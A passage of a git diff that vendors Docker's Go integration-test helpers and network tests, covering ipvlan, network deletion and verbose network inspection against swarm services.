+	name, err := createNetwork(ctx, client, name, ops...)
+	assert.NilError(t, err)
+	return name
+}
diff --git a/vendor/github.com/docker/docker/integration/internal/network/ops.go b/vendor/github.com/docker/docker/integration/internal/network/ops.go
new file mode 100644
index 0000000000..190918abed
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration/internal/network/ops.go
@@ -0,0 +1,87 @@
+package network
+
+import (
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/network"
+)
+
+// WithDriver sets the driver of the network
+func WithDriver(driver string) func(*types.NetworkCreate) {
+	return func(n *types.NetworkCreate) {
+		n.Driver = driver
+	}
+}
+
+// WithIPv6 Enables IPv6 on the network
+func WithIPv6() func(*types.NetworkCreate) {
+	return func(n *types.NetworkCreate) {
+		n.EnableIPv6 = true
+	}
+}
+
+// WithCheckDuplicate enables CheckDuplicate on the create network request
+func WithCheckDuplicate() func(*types.NetworkCreate) {
+	return func(n *types.NetworkCreate) {
+		n.CheckDuplicate = true
+	}
+}
+
+// WithInternal sets the Internal flag on the network
+func WithInternal() func(*types.NetworkCreate) {
+	return func(n *types.NetworkCreate) {
+		n.Internal = true
+	}
+}
+
+// WithMacvlan sets the network as macvlan with the specified parent
+func WithMacvlan(parent string) func(*types.NetworkCreate) {
+	return func(n *types.NetworkCreate) {
+		n.Driver = "macvlan"
+		if parent != "" {
+			n.Options = map[string]string{
+				"parent": parent,
+			}
+		}
+	}
+}
+
+// WithIPvlan sets the network as ipvlan with the specified parent and mode
+func WithIPvlan(parent, mode string) func(*types.NetworkCreate) {
+	return func(n *types.NetworkCreate) {
+		n.Driver = "ipvlan"
+		if n.Options == nil {
+			n.Options = map[string]string{}
+		}
+		if parent != "" {
+			n.Options["parent"] = parent
+		}
+		if mode != "" {
+			n.Options["ipvlan_mode"] = mode
+		}
+	}
+}
+
+// WithOption adds the specified key/value pair to network's options
+func WithOption(key, value string) func(*types.NetworkCreate) {
+	return func(n *types.NetworkCreate) {
+		if n.Options == nil {
+			n.Options = map[string]string{}
+		}
+		n.Options[key] = value
+	}
+}
+
+// WithIPAM adds an IPAM with the specified Subnet and Gateway to the network
+func WithIPAM(subnet, gateway string) func(*types.NetworkCreate) {
+	return func(n *types.NetworkCreate) {
+		if n.IPAM == nil {
+			n.IPAM = &network.IPAM{}
+		}
+
+		n.IPAM.Config = append(n.IPAM.Config, network.IPAMConfig{
+			Subnet:     subnet,
+			Gateway:    gateway,
+			AuxAddress: map[string]string{},
+		})
+	}
+}
diff --git a/vendor/github.com/docker/docker/integration/internal/requirement/requirement.go b/vendor/github.com/docker/docker/integration/internal/requirement/requirement.go
new file mode 100644
index 0000000000..004383bd05
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration/internal/requirement/requirement.go
@@ -0,0 +1,53 @@
+package requirement // import "github.com/docker/docker/integration/internal/requirement"
+
+import (
+	"net/http"
+	"strings"
+	"testing"
+	"time"
+
+	"github.com/docker/docker/pkg/parsers/kernel"
+	"gotest.tools/icmd"
+)
+
+// HasHubConnectivity checks to see if https://hub.docker.com is
+// accessible from the present environment
+func HasHubConnectivity(t *testing.T) bool {
+	t.Helper()
+	// Set a timeout on the GET at 15s
+	var timeout = 15 * time.Second
+	var url = "https://hub.docker.com"
+
+	client := http.Client{Timeout: timeout}
+	resp, err := client.Get(url)
+	if err != nil && strings.Contains(err.Error(), "use of closed network connection") {
+		t.Fatalf("Timeout for GET request on %s", url)
+	}
+	if resp != nil {
+		resp.Body.Close()
+	}
+	return err == nil
+}
+
+func overlayFSSupported() bool {
+	result := icmd.RunCommand("/bin/sh", "-c", "cat /proc/filesystems")
+	if result.Error != nil {
+		return false
+	}
+	return strings.Contains(result.Combined(), "overlay\n")
+}
+
+// Overlay2Supported returns true if the current system supports overlay2 as graphdriver
+func Overlay2Supported(kernelVersion string) bool {
+	if !overlayFSSupported() {
+		return false
+	}
+
+	daemonV, err := kernel.ParseRelease(kernelVersion)
+	if err != nil {
+		return false
+	}
+	requiredV := kernel.VersionInfo{Kernel: 4}
+	return kernel.CompareKernelVersion(*daemonV, requiredV) > -1
+
+}
diff --git a/vendor/github.com/docker/docker/integration/internal/swarm/service.go b/vendor/github.com/docker/docker/integration/internal/swarm/service.go
new file mode 100644
index 0000000000..d8b16224fb
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration/internal/swarm/service.go
@@ -0,0 +1,200 @@
+package swarm
+
+import (
+	"context"
+	"runtime"
+	"testing"
+	"time"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/filters"
+	swarmtypes "github.com/docker/docker/api/types/swarm"
+	"github.com/docker/docker/internal/test/daemon"
+	"github.com/docker/docker/internal/test/environment"
+	"gotest.tools/assert"
+	"gotest.tools/poll"
+	"gotest.tools/skip"
+)
+
+// ServicePoll tweaks the pollSettings for `service`
+func ServicePoll(config *poll.Settings) {
+	// Override the default pollSettings for `service` resource here ...
+	config.Timeout = 30 * time.Second
+	config.Delay = 100 * time.Millisecond
+	if runtime.GOARCH == "arm64" || runtime.GOARCH == "arm" {
+		config.Timeout = 90 * time.Second
+	}
+}
+
+// NetworkPoll tweaks the pollSettings for `network`
+func NetworkPoll(config *poll.Settings) {
+	// Override the default pollSettings for `network` resource here ...
+	config.Timeout = 30 * time.Second
+	config.Delay = 100 * time.Millisecond
+
+	if runtime.GOARCH == "arm64" || runtime.GOARCH == "arm" {
+		config.Timeout = 50 * time.Second
+	}
+}
+
+// ContainerPoll tweaks the pollSettings for `container`
+func ContainerPoll(config *poll.Settings) {
+	// Override the default pollSettings for `container` resource here ...
+
+	if runtime.GOARCH == "arm64" || runtime.GOARCH == "arm" {
+		config.Timeout = 30 * time.Second
+		config.Delay = 100 * time.Millisecond
+	}
+}
+
+// NewSwarm creates a swarm daemon for testing
+func NewSwarm(t *testing.T, testEnv *environment.Execution, ops ...func(*daemon.Daemon)) *daemon.Daemon {
+	t.Helper()
+	skip.If(t, testEnv.IsRemoteDaemon)
+	if testEnv.DaemonInfo.ExperimentalBuild {
+		ops = append(ops, daemon.WithExperimental)
+	}
+	d := daemon.New(t, ops...)
+	d.StartAndSwarmInit(t)
+	return d
+}
+
+// ServiceSpecOpt is used with `CreateService` to pass in service spec modifiers
+type ServiceSpecOpt func(*swarmtypes.ServiceSpec)
+
+// CreateService creates a service on the passed in swarm daemon.
+func CreateService(t *testing.T, d *daemon.Daemon, opts ...ServiceSpecOpt) string {
+	t.Helper()
+	spec := defaultServiceSpec()
+	for _, o := range opts {
+		o(&spec)
+	}
+
+	client := d.NewClientT(t)
+	defer client.Close()
+
+	resp, err := client.ServiceCreate(context.Background(), spec, types.ServiceCreateOptions{})
+	assert.NilError(t, err, "error creating service")
+	return resp.ID
+}
+
+func defaultServiceSpec() swarmtypes.ServiceSpec {
+	var spec swarmtypes.ServiceSpec
+	ServiceWithImage("busybox:latest")(&spec)
+	ServiceWithCommand([]string{"/bin/top"})(&spec)
+	ServiceWithReplicas(1)(&spec)
+	return spec
+}
+
+// ServiceWithInit sets whether the service should use init or not
+func ServiceWithInit(b *bool) func(*swarmtypes.ServiceSpec) {
+	return func(spec *swarmtypes.ServiceSpec) {
+		ensureContainerSpec(spec)
+		spec.TaskTemplate.ContainerSpec.Init = b
+	}
+}
+
+// ServiceWithImage sets the image to use for the service
+func ServiceWithImage(image string) func(*swarmtypes.ServiceSpec) {
+	return func(spec *swarmtypes.ServiceSpec) {
+		ensureContainerSpec(spec)
+		spec.TaskTemplate.ContainerSpec.Image = image
+	}
+}
+
+// ServiceWithCommand sets the command to use for the service
+func ServiceWithCommand(cmd []string) ServiceSpecOpt {
+	return func(spec *swarmtypes.ServiceSpec) {
+		ensureContainerSpec(spec)
+		spec.TaskTemplate.ContainerSpec.Command = cmd
+	}
+}
+
+// ServiceWithConfig adds the config reference to the service
+func ServiceWithConfig(configRef *swarmtypes.ConfigReference) ServiceSpecOpt {
+	return func(spec *swarmtypes.ServiceSpec) {
+		ensureContainerSpec(spec)
+		spec.TaskTemplate.ContainerSpec.Configs = append(spec.TaskTemplate.ContainerSpec.Configs, configRef)
+	}
+}
+
+// ServiceWithSecret adds the secret reference to the service
+func ServiceWithSecret(secretRef *swarmtypes.SecretReference) ServiceSpecOpt {
+	return func(spec *swarmtypes.ServiceSpec) {
+		ensureContainerSpec(spec)
+		spec.TaskTemplate.ContainerSpec.Secrets = append(spec.TaskTemplate.ContainerSpec.Secrets, secretRef)
+	}
+}
+
+// ServiceWithReplicas sets the replicas for the service
+func ServiceWithReplicas(n uint64) ServiceSpecOpt {
+	return func(spec *swarmtypes.ServiceSpec) {
+		spec.Mode = swarmtypes.ServiceMode{
+			Replicated: &swarmtypes.ReplicatedService{
+				Replicas: &n,
+			},
+		}
+	}
+}
+
+// ServiceWithName sets the name of the service
+func ServiceWithName(name string) ServiceSpecOpt {
+	return func(spec *swarmtypes.ServiceSpec) {
+		spec.Annotations.Name = name
+	}
+}
+
+// ServiceWithNetwork sets the network of the service
+func ServiceWithNetwork(network string) ServiceSpecOpt {
+	return func(spec *swarmtypes.ServiceSpec) {
+		spec.TaskTemplate.Networks = append(spec.TaskTemplate.Networks,
+			swarmtypes.NetworkAttachmentConfig{Target: network})
+	}
+}
+
+// ServiceWithEndpoint sets the Endpoint of the service
+func ServiceWithEndpoint(endpoint *swarmtypes.EndpointSpec) ServiceSpecOpt {
+	return func(spec *swarmtypes.ServiceSpec) {
+		spec.EndpointSpec = endpoint
+	}
+}
+
+// GetRunningTasks gets the list of running tasks for a service
+func GetRunningTasks(t *testing.T, d *daemon.Daemon, serviceID string) []swarmtypes.Task {
+	t.Helper()
+	client := d.NewClientT(t)
+	defer client.Close()
+
+	filterArgs := filters.NewArgs()
+	filterArgs.Add("desired-state", "running")
+	filterArgs.Add("service", serviceID)
+
+	options := types.TaskListOptions{
+		Filters: filterArgs,
+	}
+	tasks, err := client.TaskList(context.Background(), options)
+	assert.NilError(t, err)
+	return tasks
+}
+
+// ExecTask runs the passed in exec config on the given task
+func ExecTask(t *testing.T, d *daemon.Daemon, task swarmtypes.Task, config types.ExecConfig) types.HijackedResponse {
+	t.Helper()
+	client := d.NewClientT(t)
+	defer client.Close()
+
+	ctx := context.Background()
+	resp, err := client.ContainerExecCreate(ctx, task.Status.ContainerStatus.ContainerID, config)
+	assert.NilError(t, err, "error creating exec")
+
+	startCheck := types.ExecStartCheck{}
+	attach, err := client.ContainerExecAttach(ctx, resp.ID, startCheck)
+	assert.NilError(t, err, "error attaching to exec")
+	return attach
+}
+
+func ensureContainerSpec(spec *swarmtypes.ServiceSpec) {
+	if spec.TaskTemplate.ContainerSpec == nil {
+		spec.TaskTemplate.ContainerSpec = &swarmtypes.ContainerSpec{}
+	}
+}
diff --git a/vendor/github.com/docker/docker/integration/network/delete_test.go b/vendor/github.com/docker/docker/integration/network/delete_test.go
new file mode 100644
index 0000000000..c2684ae247
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration/network/delete_test.go
@@ -0,0 +1,73 @@
+package network // import "github.com/docker/docker/integration/network"
+
+import (
+	"context"
+	"testing"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/versions"
+	"github.com/docker/docker/integration/internal/network"
+	"github.com/docker/docker/internal/test/request"
+	"gotest.tools/assert"
+	is "gotest.tools/assert/cmp"
+	"gotest.tools/skip"
+)
+
+func containsNetwork(nws []types.NetworkResource, networkID string) bool {
+	for _, n := range nws {
+		if n.ID == networkID {
+			return true
+		}
+	}
+	return false
+}
+
+// createAmbiguousNetworks creates three networks, of which the second network
+// uses a prefix of the first network's ID as name. The third network uses the
+// first network's ID as name.
+//
+// After successful creation, properties of all three networks is returned
+func createAmbiguousNetworks(t *testing.T) (string, string, string) {
+	client := request.NewAPIClient(t)
+	ctx := context.Background()
+
+	testNet := network.CreateNoError(t, ctx, client, "testNet")
+	idPrefixNet := network.CreateNoError(t, ctx, client, testNet[:12])
+	fullIDNet := network.CreateNoError(t, ctx, client, testNet)
+
+	nws, err := client.NetworkList(ctx, types.NetworkListOptions{})
+	assert.NilError(t, err)
+
+	assert.Check(t, is.Equal(true, containsNetwork(nws, testNet)), "failed to create network testNet")
+	assert.Check(t, is.Equal(true, containsNetwork(nws, idPrefixNet)), "failed to create network idPrefixNet")
+	assert.Check(t, is.Equal(true, containsNetwork(nws, fullIDNet)), "failed to create network fullIDNet")
+	return testNet, idPrefixNet, fullIDNet
+}
+
+// TestDockerNetworkDeletePreferID tests that if a network with a name
+// equal to another network's ID exists, the Network with the given
+// ID is removed, and not the network with the given name.
+func TestDockerNetworkDeletePreferID(t *testing.T) {
+	skip.If(t, versions.LessThan(testEnv.DaemonAPIVersion(), "1.34"), "broken in earlier versions")
+	defer setupTest(t)()
+	client := request.NewAPIClient(t)
+	ctx := context.Background()
+	testNet, idPrefixNet, fullIDNet := createAmbiguousNetworks(t)
+
+	// Delete the network using a prefix of the first network's ID as name.
+	// This should the network name with the id-prefix, not the original network.
+	err := client.NetworkRemove(ctx, testNet[:12])
+	assert.NilError(t, err)
+
+	// Delete the network using networkID. This should remove the original
+	// network, not the network with the name equal to the networkID
+	err = client.NetworkRemove(ctx, testNet)
+	assert.NilError(t, err)
+
+	// networks "testNet" and "idPrefixNet" should be removed, but "fullIDNet" should still exist
+	nws, err := client.NetworkList(ctx, types.NetworkListOptions{})
+	assert.NilError(t, err)
+	assert.Check(t, is.Equal(false, containsNetwork(nws, testNet)), "Network testNet not removed")
+	assert.Check(t, is.Equal(false, containsNetwork(nws, idPrefixNet)), "Network idPrefixNet not removed")
+	assert.Check(t, is.Equal(true, containsNetwork(nws, fullIDNet)), "Network fullIDNet not found")
+}
diff --git a/vendor/github.com/docker/docker/integration/network/helpers.go b/vendor/github.com/docker/docker/integration/network/helpers.go
new file mode 100644
index 0000000000..c0d70a168e
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration/network/helpers.go
@@ -0,0 +1,85 @@
+package network
+
+import (
+	"context"
+	"fmt"
+	"testing"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/client"
+	"github.com/docker/docker/pkg/parsers/kernel"
+	"gotest.tools/assert/cmp"
+	"gotest.tools/icmd"
+)
+
+// CreateMasterDummy creates a dummy network interface
+func CreateMasterDummy(t *testing.T, master string) {
+	// ip link add <dummy_name> type dummy
+	icmd.RunCommand("ip", "link", "add", master, "type", "dummy").Assert(t, icmd.Success)
+	icmd.RunCommand("ip", "link", "set", master, "up").Assert(t, icmd.Success)
+}
+
+// CreateVlanInterface creates a vlan network interface
+func CreateVlanInterface(t *testing.T, master, slave, id string) {
+	// ip link add link <master> name <master>.<VID> type vlan id <VID>
+	icmd.RunCommand("ip", "link", "add", "link", master, "name", slave, "type", "vlan", "id", id).Assert(t, icmd.Success)
+	// ip link set <sub_interface_name> up
+	icmd.RunCommand("ip", "link", "set", slave, "up").Assert(t, icmd.Success)
+}
+
+// DeleteInterface deletes a network interface
+func DeleteInterface(t *testing.T, ifName string) {
+	icmd.RunCommand("ip", "link", "delete", ifName).Assert(t, icmd.Success)
+	icmd.RunCommand("iptables", "-t", "nat", "--flush").Assert(t, icmd.Success)
+	icmd.RunCommand("iptables", "--flush").Assert(t, icmd.Success)
+}
+
+// LinkExists verifies that a link exists
+func LinkExists(t *testing.T, master string) {
+	// verify the specified link exists, ip link show <link_name>
+	icmd.RunCommand("ip", "link", "show", master).Assert(t, icmd.Success)
+}
+
+// IsNetworkAvailable provides a comparison to check if a docker network is available
+func IsNetworkAvailable(c client.NetworkAPIClient, name string) cmp.Comparison {
+	return func() cmp.Result {
+		networks, err := c.NetworkList(context.Background(), types.NetworkListOptions{})
+		if err != nil {
+			return cmp.ResultFromError(err)
+		}
+		for _, network := range networks {
+			if network.Name == name {
+				return cmp.ResultSuccess
+			}
+		}
+		return cmp.ResultFailure(fmt.Sprintf("could not find network %s", name))
+	}
+}
+
+// IsNetworkNotAvailable provides a comparison to check if a docker network is not available
+func IsNetworkNotAvailable(c client.NetworkAPIClient, name string) cmp.Comparison {
+	return func() cmp.Result {
+		networks, err := c.NetworkList(context.Background(), types.NetworkListOptions{})
+		if err != nil {
+			return cmp.ResultFromError(err)
+		}
+		for _, network := range networks {
+			if network.Name == name {
+				return cmp.ResultFailure(fmt.Sprintf("network %s is still present", name))
+			}
+		}
+		return cmp.ResultSuccess
+	}
+}
+
+// CheckKernelMajorVersionGreaterOrEqualThen returns whether the kernel version is greater or equal than the one provided
+func CheckKernelMajorVersionGreaterOrEqualThen(kernelVersion int, majorVersion int) bool {
+	kv, err := kernel.GetKernelVersion()
+	if err != nil {
+		return false
+	}
+	if kv.Kernel < kernelVersion || (kv.Kernel == kernelVersion && kv.Major < majorVersion) {
+		return false
+	}
+	return true
+}
diff --git a/vendor/github.com/docker/docker/integration/network/inspect_test.go b/vendor/github.com/docker/docker/integration/network/inspect_test.go
new file mode 100644
index 0000000000..659ca29735
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration/network/inspect_test.go
@@ -0,0 +1,180 @@
+package network // import "github.com/docker/docker/integration/network"
+
+import (
+	"context"
+	"testing"
+	"time"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/filters"
+	swarmtypes "github.com/docker/docker/api/types/swarm"
+	"github.com/docker/docker/client"
+	"github.com/docker/docker/integration/internal/swarm"
+	"gotest.tools/assert"
+	"gotest.tools/poll"
+)
+
+const defaultSwarmPort = 2477
+
+func TestInspectNetwork(t *testing.T) {
+	defer setupTest(t)()
+	d := swarm.NewSwarm(t, testEnv)
+	defer d.Stop(t)
+	client := d.NewClientT(t)
+	defer client.Close()
+
+	overlayName := "overlay1"
+	networkCreate := types.NetworkCreate{
+		CheckDuplicate: true,
+		Driver:         "overlay",
+	}
+
+	netResp, err := client.NetworkCreate(context.Background(), overlayName, networkCreate)
+	assert.NilError(t, err)
+	overlayID := netResp.ID
+
+	var instances uint64 = 4
+	serviceName := "TestService" + t.Name()
+
+	serviceID := swarm.CreateService(t, d,
+		swarm.ServiceWithReplicas(instances),
+		swarm.ServiceWithName(serviceName),
+		swarm.ServiceWithNetwork(overlayName),
+	)
+
+	poll.WaitOn(t, serviceRunningTasksCount(client, serviceID, instances), swarm.ServicePoll)
+
+	_, _, err = client.ServiceInspectWithRaw(context.Background(), serviceID, types.ServiceInspectOptions{})
+	assert.NilError(t, err)
+
+	// Test inspect verbose with full NetworkID
+	networkVerbose, err := client.NetworkInspect(context.Background(), overlayID, types.NetworkInspectOptions{
+		Verbose: true,
+	})
+	assert.NilError(t, err)
+	assert.Assert(t, validNetworkVerbose(networkVerbose, serviceName, instances))
+
+	// Test inspect verbose with partial NetworkID
+	networkVerbose, err = client.NetworkInspect(context.Background(), overlayID[0:11], types.NetworkInspectOptions{
+		Verbose: true,
+	})
+	assert.NilError(t, err)
+	assert.Assert(t, validNetworkVerbose(networkVerbose, serviceName, instances))
+
+	// Test inspect verbose with Network name and swarm scope
+	networkVerbose, err = client.NetworkInspect(context.Background(), overlayName, types.NetworkInspectOptions{
+		Verbose: true,
+		Scope:   "swarm",
+	})
+	assert.NilError(t, err)
+	assert.Assert(t, validNetworkVerbose(networkVerbose, serviceName, instances))
+
+	err = client.ServiceRemove(context.Background(), serviceID)
+	assert.NilError(t, err)
+
+	poll.WaitOn(t, serviceIsRemoved(client, serviceID), swarm.ServicePoll)
+	poll.WaitOn(t, noTasks(client), swarm.ServicePoll)
+
+	serviceID2 := swarm.CreateService(t, d,
+		swarm.ServiceWithReplicas(instances),
+		swarm.ServiceWithName(serviceName),
+		swarm.ServiceWithNetwork(overlayName),
+	)
+
+	poll.WaitOn(t, serviceRunningTasksCount(client, serviceID2, instances), swarm.ServicePoll)
+
+	err = client.ServiceRemove(context.Background(), serviceID2)
+	assert.NilError(t, err)
+
+	poll.WaitOn(t, serviceIsRemoved(client, serviceID2), swarm.ServicePoll)
+	poll.WaitOn(t, noTasks(client), swarm.ServicePoll)
+
+	err = client.NetworkRemove(context.Background(), overlayID)
+	assert.NilError(t, err)
+
+	poll.WaitOn(t, networkIsRemoved(client, overlayID), poll.WithTimeout(1*time.Minute), poll.WithDelay(10*time.Second))
+}
+
+func serviceRunningTasksCount(client client.ServiceAPIClient, serviceID string, instances uint64) func(log poll.LogT) poll.Result {
+	return func(log poll.LogT) poll.Result {
+		filter := filters.NewArgs()
+		filter.Add("service", serviceID)
+		tasks, err := client.TaskList(context.Background(), types.TaskListOptions{
+			Filters: filter,
+		})
+		switch {
+		case err != nil:
+			return poll.Error(err)
+		case len(tasks) == int(instances):
+			for _, task := range tasks {
+				if task.Status.State != swarmtypes.TaskStateRunning {
+					return poll.Continue("waiting for tasks to enter run state")
+				}
+			}
+			return poll.Success()
+		default:
+			return poll.Continue("task count at %d waiting for %d", len(tasks), instances)
+		}
+	}
+}
+
+func networkIsRemoved(client client.NetworkAPIClient, networkID string) func(log poll.LogT) poll.Result {
+	return func(log poll.LogT) poll.Result {
+		_, err := client.NetworkInspect(context.Background(), networkID, types.NetworkInspectOptions{})
+		if err == nil {
+			return poll.Continue("waiting for network %s to be removed", networkID)
+		}
+		return poll.Success()
+	}
+}
+
+func serviceIsRemoved(client client.ServiceAPIClient, serviceID string) func(log poll.LogT) poll.Result {
+	return func(log poll.LogT) poll.Result {
+		filter := filters.NewArgs()
+		filter.Add("service", serviceID)
+		_, err := client.TaskList(context.Background(), types.TaskListOptions{
+			Filters: filter,
+		})
+		if err == nil {
+			return poll.Continue("waiting for service %s to be deleted", serviceID)
+		}
+		return poll.Success()
+	}
+}
+
+func noTasks(client client.ServiceAPIClient) func(log poll.LogT) poll.Result {
+	return func(log poll.LogT) poll.Result {
+		filter := filters.NewArgs()
+		tasks, err := client.TaskList(context.Background(), types.TaskListOptions{
+			Filters: filter,
+		})
+		switch {
+		case err != nil:
+			return poll.Error(err)
+		case len(tasks) == 0:
+			return poll.Success()
+		default:
+			return poll.Continue("task count at %d waiting for 0", len(tasks))
+		}
+	}
+}
+
+// Check to see if Service and Tasks info are part of the inspect verbose response
+func validNetworkVerbose(network types.NetworkResource, service string, instances uint64) bool {
+	if service, ok := network.Services[service]; ok {
+		if len(service.Tasks) != int(instances) {
+			return false
+		}
+	}
+
+	if network.IPAM.Config == nil {
+		return false
+	}
+
+	for _, cfg := range network.IPAM.Config {
+		if cfg.Gateway == "" || cfg.Subnet == "" {
+			return false
+		}
+	}
+	return true
+}
diff --git a/vendor/github.com/docker/docker/integration/network/ipvlan/ipvlan_test.go b/vendor/github.com/docker/docker/integration/network/ipvlan/ipvlan_test.go
new file mode 100644
index 0000000000..3da255e747
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration/network/ipvlan/ipvlan_test.go
@@ -0,0 +1,432 @@
+package ipvlan
+
+import (
+	"context"
+	"strings"
+	"testing"
+	"time"
+
+	dclient "github.com/docker/docker/client"
+	"github.com/docker/docker/integration/internal/container"
+	net "github.com/docker/docker/integration/internal/network"
+	n "github.com/docker/docker/integration/network"
+	"github.com/docker/docker/internal/test/daemon"
+	"gotest.tools/assert"
+	"gotest.tools/skip"
+)
+
+func TestDockerNetworkIpvlanPersistance(t *testing.T) {
+	// verify the driver automatically provisions the 802.1q link (di-dummy0.70)
+	skip.If(t, testEnv.DaemonInfo.OSType != "linux")
+	skip.If(t, testEnv.IsRemoteDaemon())
+	skip.If(t, !ipvlanKernelSupport(), "Kernel doesn't support ipvlan")
+
+	d := daemon.New(t, daemon.WithExperimental)
+	d.StartWithBusybox(t)
+	defer d.Stop(t)
+
+	// master dummy interface 'di' notation represent 'docker ipvlan'
+	master := "di-dummy0"
+	n.CreateMasterDummy(t, master)
+	defer n.DeleteInterface(t, master)
+
+	client, err := d.NewClient()
+	assert.NilError(t, err)
+
+	// create a network specifying the desired sub-interface name
+	netName := "di-persist"
+	net.CreateNoError(t, context.Background(), client, netName,
+		net.WithIPvlan("di-dummy0.70", ""),
+	)
+
+	assert.Check(t, n.IsNetworkAvailable(client, netName))
+	// Restart docker daemon to test the config has persisted to disk
+	d.Restart(t)
+	assert.Check(t, n.IsNetworkAvailable(client, netName))
+}
+
+func TestDockerNetworkIpvlan(t *testing.T) {
+	skip.If(t, testEnv.DaemonInfo.OSType != "linux")
+	skip.If(t, testEnv.IsRemoteDaemon())
+	skip.If(t, !ipvlanKernelSupport(), "Kernel doesn't support ipvlan")
+
+	for _, tc := range []struct {
+		name string
+		test func(dclient.APIClient) func(*testing.T)
+	}{
+		{
+			name: "Subinterface",
+			test: testIpvlanSubinterface,
+		}, {
+			name: "OverlapParent",
+			test: testIpvlanOverlapParent,
+		}, {
+			name: "L2NilParent",
+			test: testIpvlanL2NilParent,
+		}, {
+			name: "L2InternalMode",
+			test: testIpvlanL2InternalMode,
+		}, {
+			name: "L3NilParent",
+			test: testIpvlanL3NilParent,
+		}, {
+			name: "L3InternalMode",
+			test: testIpvlanL3InternalMode,
+		}, {
+			name: "L2MultiSubnet",
+			test: testIpvlanL2MultiSubnet,
+		}, {
+			name: "L3MultiSubnet",
+			test: testIpvlanL3MultiSubnet,
+		}, {
+			name: "Addressing",
+			test: testIpvlanAddressing,
+		},
+	} {
+		d := daemon.New(t, daemon.WithExperimental)
+		d.StartWithBusybox(t)
+
+		client, err := d.NewClient()
+		assert.NilError(t, err)
+
+		t.Run(tc.name, tc.test(client))
+
+		d.Stop(t)
+		// FIXME(vdemeester) clean network
+	}
+}
+
+func testIpvlanSubinterface(client dclient.APIClient) func(*testing.T) {
+	return func(t *testing.T) {
+		master := "di-dummy0"
+		n.CreateMasterDummy(t, master)
+		defer n.DeleteInterface(t, master)
+
+		netName := "di-subinterface"
+		net.CreateNoError(t, context.Background(), client, netName,
+			net.WithIPvlan("di-dummy0.60", ""),
+		)
+		assert.Check(t, n.IsNetworkAvailable(client, netName))
+
+		// delete the network while preserving the parent link
+		err := client.NetworkRemove(context.Background(), netName)
+		assert.NilError(t, err)
+
+		assert.Check(t, n.IsNetworkNotAvailable(client, netName))
+		// verify the network delete did not delete the predefined link
+		n.LinkExists(t, "di-dummy0")
+	}
+}
+
+func testIpvlanOverlapParent(client dclient.APIClient) func(*testing.T) {
+	return func(t *testing.T) {
+		// verify the same parent interface cannot be used if already in use by an existing network
+		master := "di-dummy0"
+		parent := master + ".30"
+		n.CreateMasterDummy(t, master)
+		defer n.DeleteInterface(t, master)
+		n.CreateVlanInterface(t, master, parent, "30")
+
+		netName := "di-subinterface"
+		net.CreateNoError(t, context.Background(), client, netName,
+			net.WithIPvlan(parent, ""),
+		)
+		assert.Check(t, n.IsNetworkAvailable(client, netName))
+
+		_, err := net.Create(context.Background(), client, netName,
+			net.WithIPvlan(parent, ""),
+		)
+		// verify that the overlap returns an error
+		assert.Check(t, err != nil)
+	}
+}
+
+func testIpvlanL2NilParent(client dclient.APIClient) func(*testing.T) {
+	return func(t *testing.T) {
+		// ipvlan l2 mode - dummy parent interface is provisioned dynamically
+		netName := "di-nil-parent"
+		net.CreateNoError(t, context.Background(), client, netName,
+			net.WithIPvlan("", ""),
+		)
+		assert.Check(t, n.IsNetworkAvailable(client, netName))
+
+		ctx := context.Background()
+		id1 := container.Run(t, ctx, client, container.WithNetworkMode(netName))
+		id2 := container.Run(t, ctx, client, container.WithNetworkMode(netName))
+
+		_, err := container.Exec(ctx, client, id2, []string{"ping", "-c", "1", id1})
+		assert.NilError(t, err)
+	}
+}
+
+func testIpvlanL2InternalMode(client dclient.APIClient) func(*testing.T) {
+	return func(t *testing.T) {
+		netName := "di-internal"
+		net.CreateNoError(t, context.Background(), client, netName,
+			net.WithIPvlan("", ""),
+			net.WithInternal(),
+		)
+		assert.Check(t, n.IsNetworkAvailable(client, netName))
+
+		ctx := context.Background()
+		id1 := container.Run(t, ctx, client, container.WithNetworkMode(netName))
+		id2 := container.Run(t, ctx, client, container.WithNetworkMode(netName))
+
+		timeoutCtx, cancel := context.WithTimeout(context.Background(), 1*time.Second)
+		defer cancel()
+		_, err := container.Exec(timeoutCtx, client, id1, []string{"ping", "-c", "1", "-w", "1", "8.8.8.8"})
+		// FIXME(vdemeester) check the time of error ?
+		assert.Check(t, err != nil)
+		assert.Check(t, timeoutCtx.Err() == context.DeadlineExceeded)
+
+		_, err = container.Exec(ctx, client, id2, []string{"ping", "-c", "1", id1})
+		assert.NilError(t, err)
+	}
+}
+
+func testIpvlanL3NilParent(client dclient.APIClient) func(*testing.T) {
+	return func(t *testing.T) {
+		netName := "di-nil-parent-l3"
+		net.CreateNoError(t, context.Background(), client, netName,
+			net.WithIPvlan("", "l3"),
+			net.WithIPAM("172.28.230.0/24", ""),
+			net.WithIPAM("172.28.220.0/24", ""),
+		)
+		assert.Check(t, n.IsNetworkAvailable(client, netName))
+
+		ctx := context.Background()
+		id1 := container.Run(t, ctx, client,
+			container.WithNetworkMode(netName),
+			container.WithIPv4(netName, "172.28.220.10"),
+		)
+		id2 := container.Run(t, ctx, client,
+			container.WithNetworkMode(netName),
+			container.WithIPv4(netName, "172.28.230.10"),
+		)
+
+		_, err := container.Exec(ctx, client, id2, []string{"ping", "-c", "1", id1})
+		assert.NilError(t, err)
+	}
+}
+
+func testIpvlanL3InternalMode(client dclient.APIClient) func(*testing.T) {
+	return func(t *testing.T) {
+		netName := "di-internal-l3"
+		net.CreateNoError(t, context.Background(), client, netName,
+			net.WithIPvlan("", "l3"),
+			net.WithInternal(),
+			net.WithIPAM("172.28.230.0/24", ""),
+			net.WithIPAM("172.28.220.0/24", ""),
+		)
+		assert.Check(t, n.IsNetworkAvailable(client, netName))
+
+		ctx := context.Background()
+		id1 := container.Run(t, ctx, client,
+			container.WithNetworkMode(netName),
+			container.WithIPv4(netName, "172.28.220.10"),
+		)
+		id2 := container.Run(t, ctx, client,
+			container.WithNetworkMode(netName),
